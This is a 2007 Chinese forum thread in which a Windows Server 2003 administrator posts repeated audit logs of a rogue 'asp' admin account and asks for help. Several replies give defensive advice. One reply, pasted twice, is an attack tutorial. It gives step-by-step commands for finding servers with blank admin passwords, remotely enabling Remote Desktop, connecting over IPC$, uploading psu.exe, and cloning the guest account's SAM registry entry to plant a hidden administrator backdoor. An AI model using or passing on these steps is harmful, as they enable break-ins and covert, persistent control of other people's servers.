9,506
社区成员
发帖
与我相关
我的任务
分享紧急求助,2003服务器被黑客加了超级用户,求各位大侠帮忙诊断,谢谢了
2007-5-16 8:22:37 Security 审核成功 帐户管理 636 NT AUTHORITY\SYSTEM cc012pc "添加了启用安全的本地组成员:
成员名称: -
成员ID: cc012pc\asp
目标帐户名称: Administrators
目标域: Builtin
目标帐户 ID: BUILTIN\Administrators
调用方用户名称: cc012pc$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
特权: -
"
2007-5-16 8:22:25 Security 审核成功 帐户管理 636 NT AUTHORITY\SYSTEM cc012pc "添加了启用安全的本地组成员:
成员名称: -
成员ID: cc012pc\asp
目标帐户名称: Users
目标域: Builtin
目标帐户 ID: BUILTIN\Users
调用方用户名称: cc012pc$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
特权: -
"
2007-5-16 8:22:24 Security 审核成功 帐户管理 628 NT AUTHORITY\SYSTEM cc012pc "设置了用户帐户密码:
目标帐户名: asp
目标域: cc012pc
目标帐户 ID: cc012pc\asp
调用方用户名: cc012pc$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
"
2007-5-16 8:22:24 Security 审核成功 帐户管理 642 NT AUTHORITY\SYSTEM cc012pc "更改了用户帐户:
目标帐户名称: asp
目标域: cc012pc
目标帐户 ID: cc012pc\asp
调用方用户名: cc012pc$
调用方所属域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
特权: -
更改的属性:
SAM 帐户名称: asp
显示名称: <未设置值>
用户主要名称: -
主目录: <未设置值>
主驱动器: <未设置值>
脚本路径: <未设置值>
配置文件路径: <未设置值>
用户工作站: <未设置值>
上一次设置的密码: 2007-5-16 8:22:24
帐户过期: <从不>
主要组 ID: 513
AllowedToDelegateTo: -
旧 UAC 值: 0x139DF0
新 UAC 值: 0x139DF0
用户帐户控制: -
用户参数: -
Sid 历史: -
登录时间(以小时计): <值已更改,但未显示>
"
2007-5-16 8:22:24 Security 审核成功 帐户管理 626 NT AUTHORITY\SYSTEM cc012pc "启用了用户帐户:
目标帐户名: asp
目标域: cc012pc
目标帐户 ID: cc012pc\asp
调用方用户名: cc012pc$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
"
2007-5-16 8:22:24 Security 审核成功 帐户管理 624 NT AUTHORITY\SYSTEM cc012pc "创建了用户帐户:
新的帐户名: asp
新域: cc012pc
新帐户标识: cc012pc\asp
调用方用户名: cc012pc$
调用方域: WORKGROUP
%调用方登录 ID: (0x0,0x3E7)
特权: -
属性:
SAM 帐户名称: asp
显示名称: <未设置值>
用户主要名称: -
主目录: <未设置值>
主驱动器: <未设置值>
脚本路径: <未设置值>
配置文件路径: <未设置值>
用户工作站: <未设置值>
上一次设置的密码: <从不>
帐户过期: <从不>
主要组 ID: 513
AllowedToDelegateTo: -
旧 UAC 值: 0x139DF0
新 UAC 值: 0x139DF0
用户帐户控制: -
用户参数: <未设置值>
Sid 历史: -
登录时间: <值已更改,但未显示>
"
2007-5-16 8:22:24 Security 审核成功 帐户管理 632 NT AUTHORITY\SYSTEM cc012pc "添加了启用安全的全局组成员:
成员名称: -
成员 ID: cc012pc\asp
目标帐户名称: None
目标域: cc012pc
目标帐户 ID: cc012pc\None
调用方用户名称: cc012pc$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
特权: -
成员名称: -
成员ID: cc012pc\asp
目标帐户名称: Administrators
目标域: Builtin
目标帐户 ID: BUILTIN\Administrators
调用方用户名称: cc012pc$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
特权: -
"
2007-5-16 8:22:25 Security 审核成功 帐户管理 636 NT AUTHORITY\SYSTEM cc012pc "添加了启用安全的本地组成员:
成员名称: -
成员ID: cc012pc\asp
目标帐户名称: Users
目标域: Builtin
目标帐户 ID: BUILTIN\Users
调用方用户名称: cc012pc$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
特权: -
"
2007-5-16 8:22:24 Security 审核成功 帐户管理 628 NT AUTHORITY\SYSTEM cc012pc "设置了用户帐户密码:
目标帐户名: asp
目标域: cc012pc
目标帐户 ID: cc012pc\asp
调用方用户名: cc012pc$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
"
2007-5-16 8:22:24 Security 审核成功 帐户管理 642 NT AUTHORITY\SYSTEM cc012pc "更改了用户帐户:
目标帐户名称: asp
目标域: cc012pc
目标帐户 ID: cc012pc\asp
调用方用户名: cc012pc$
调用方所属域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
特权: -
更改的属性:
SAM 帐户名称: asp
显示名称: <未设置值>
用户主要名称: -
主目录: <未设置值>
主驱动器: <未设置值>
脚本路径: <未设置值>
配置文件路径: <未设置值>
用户工作站: <未设置值>
上一次设置的密码: 2007-5-16 8:22:24
帐户过期: <从不>
主要组 ID: 513
AllowedToDelegateTo: -
旧 UAC 值: 0x139DF0
新 UAC 值: 0x139DF0
用户帐户控制: -
用户参数: -
Sid 历史: -
登录时间(以小时计): <值已更改,但未显示>
"
2007-5-16 8:22:24 Security 审核成功 帐户管理 626 NT AUTHORITY\SYSTEM cc012pc "启用了用户帐户:
目标帐户名: asp
目标域: cc012pc
目标帐户 ID: cc012pc\asp
调用方用户名: cc012pc$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
"
2007-5-16 8:22:24 Security 审核成功 帐户管理 624 NT AUTHORITY\SYSTEM cc012pc "创建了用户帐户:
新的帐户名: asp
新域: cc012pc
新帐户标识: cc012pc\asp
调用方用户名: cc012pc$
调用方域: WORKGROUP
%调用方登录 ID: (0x0,0x3E7)
特权: -
属性:
SAM 帐户名称: asp
显示名称: <未设置值>
用户主要名称: -
主目录: <未设置值>
主驱动器: <未设置值>
脚本路径: <未设置值>
配置文件路径: <未设置值>
用户工作站: <未设置值>
上一次设置的密码: <从不>
帐户过期: <从不>
主要组 ID: 513
AllowedToDelegateTo: -
旧 UAC 值: 0x139DF0
新 UAC 值: 0x139DF0
用户帐户控制: -
用户参数: <未设置值>
Sid 历史: -
登录时间: <值已更改,但未显示>
"
2007-5-16 8:22:24 Security 审核成功 帐户管理 632 NT AUTHORITY\SYSTEM cc012pc "添加了启用安全的全局组成员:
成员名称: -
成员 ID: cc012pc\asp
目标帐户名称: None
目标域: cc012pc
目标帐户 ID: cc012pc\None
调用方用户名称: cc012pc$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
特权: -
...全文
请发表友善的回复…
发表回复
wxb80 2007-05-16
- 打赏
- 举报
高都去那里了啊?
airfish108 2007-05-16
- 打赏
- 举报
兄弟~你这是这机器啊~你打个补丁加个防火墙不行吗?顺便再用x-scan扫一下,看看有什么漏洞,然后补上,再用楼上说的net user 看看,有不认识的用户吗,删掉~
acura 2007-05-16
- 打赏
- 举报
在你的系统中有隐藏帐户,用net user查看
net user的用法
http://topic.csdn.net/t/20041107/12/3529286.html
高级用法
http://www.gotoread.com/vo/4036/page420916.html
net user的用法
http://topic.csdn.net/t/20041107/12/3529286.html
高级用法
http://www.gotoread.com/vo/4036/page420916.html
xuzheng318 2007-05-16
- 打赏
- 举报
等待高手!
andyzgx1 2007-05-16
- 打赏
- 举报
扫描的X-Scan V2.3、WINNTAutoAttack、流光!
X-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!
远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe)
克隆帐户用个psu就可以了~!
OK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空
运行CMD(2000下的DOS),我们给它开终端!
命令如下!
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装!
一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t
安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛!
回到DOS下!我们建立IPC$连接!
net use \\120.0.0.1\ipc$ "" /user:"administrator"
这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!
copy psu.exe \\120.0.0.1\admin$\system32
上传完毕后,开始在肉鸡做后门帐户!看肉鸡!
假设guest用户被禁用,我们就是要利用guest做后门帐户!
在该服务器运行CMD,在命令行下输入
psu -p regedit -i PID
这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器!
看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是5458
那么,命令就是这样
psu -p regedit -i 5458
这样直接打开注册表,可以读取本地sam的信息。
打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户!
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
查看administrator的类型,是if4,再看guest的是if5
好了,知道了类型后,打开
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
双击右侧的F,把刚复制的粘贴到里面!
做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。
打开CMD,在命令行下输入
net user guest password
这条命令是给guest设置密码,后面的password就是密码
然后输入
net user guest /active:y
这命令是激活guest帐户,然后我们把他禁用
net user guest /active:n
上面的三行命令必须在DOS下执行!
OK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了!
而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的!
注销一下,用guest登陆吧!
X-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!
远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe)
克隆帐户用个psu就可以了~!
OK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空
运行CMD(2000下的DOS),我们给它开终端!
命令如下!
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装!
一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t
安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛!
回到DOS下!我们建立IPC$连接!
net use \\120.0.0.1\ipc$ "" /user:"administrator"
这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!
copy psu.exe \\120.0.0.1\admin$\system32
上传完毕后,开始在肉鸡做后门帐户!看肉鸡!
假设guest用户被禁用,我们就是要利用guest做后门帐户!
在该服务器运行CMD,在命令行下输入
psu -p regedit -i PID
这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器!
看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是5458
那么,命令就是这样
psu -p regedit -i 5458
这样直接打开注册表,可以读取本地sam的信息。
打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户!
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
查看administrator的类型,是if4,再看guest的是if5
好了,知道了类型后,打开
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
双击右侧的F,把刚复制的粘贴到里面!
做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。
打开CMD,在命令行下输入
net user guest password
这条命令是给guest设置密码,后面的password就是密码
然后输入
net user guest /active:y
这命令是激活guest帐户,然后我们把他禁用
net user guest /active:n
上面的三行命令必须在DOS下执行!
OK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了!
而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的!
注销一下,用guest登陆吧!
andyzgx1 2007-05-16
- 打赏
- 举报
不是高手!帮顶!
li_net 2007-05-16
- 打赏
- 举报
这些天老是听到windows2003的服务器被黑……
若对windows2003不是很熟的就别用2003啦
若对windows2003不是很熟的就别用2003啦
li_net 2007-05-16
- 打赏
- 举报
是否网站有漏洞,或系统留了后门,我的用windos2000server的都没被黑过,三年了。
对2003的server不大了解,若仅是用asp的,建议用2000server吧,
看来你的系统要格了重装了,像你的情况基本上是很难搞的,因为黑客已把它用户的权限搞到了system的程度,根本是很难改回来了。
断开网络,配好另一台服务器,然后再重装吧
我不是高手,以上仅是建议,或楼主百度一下有关信息
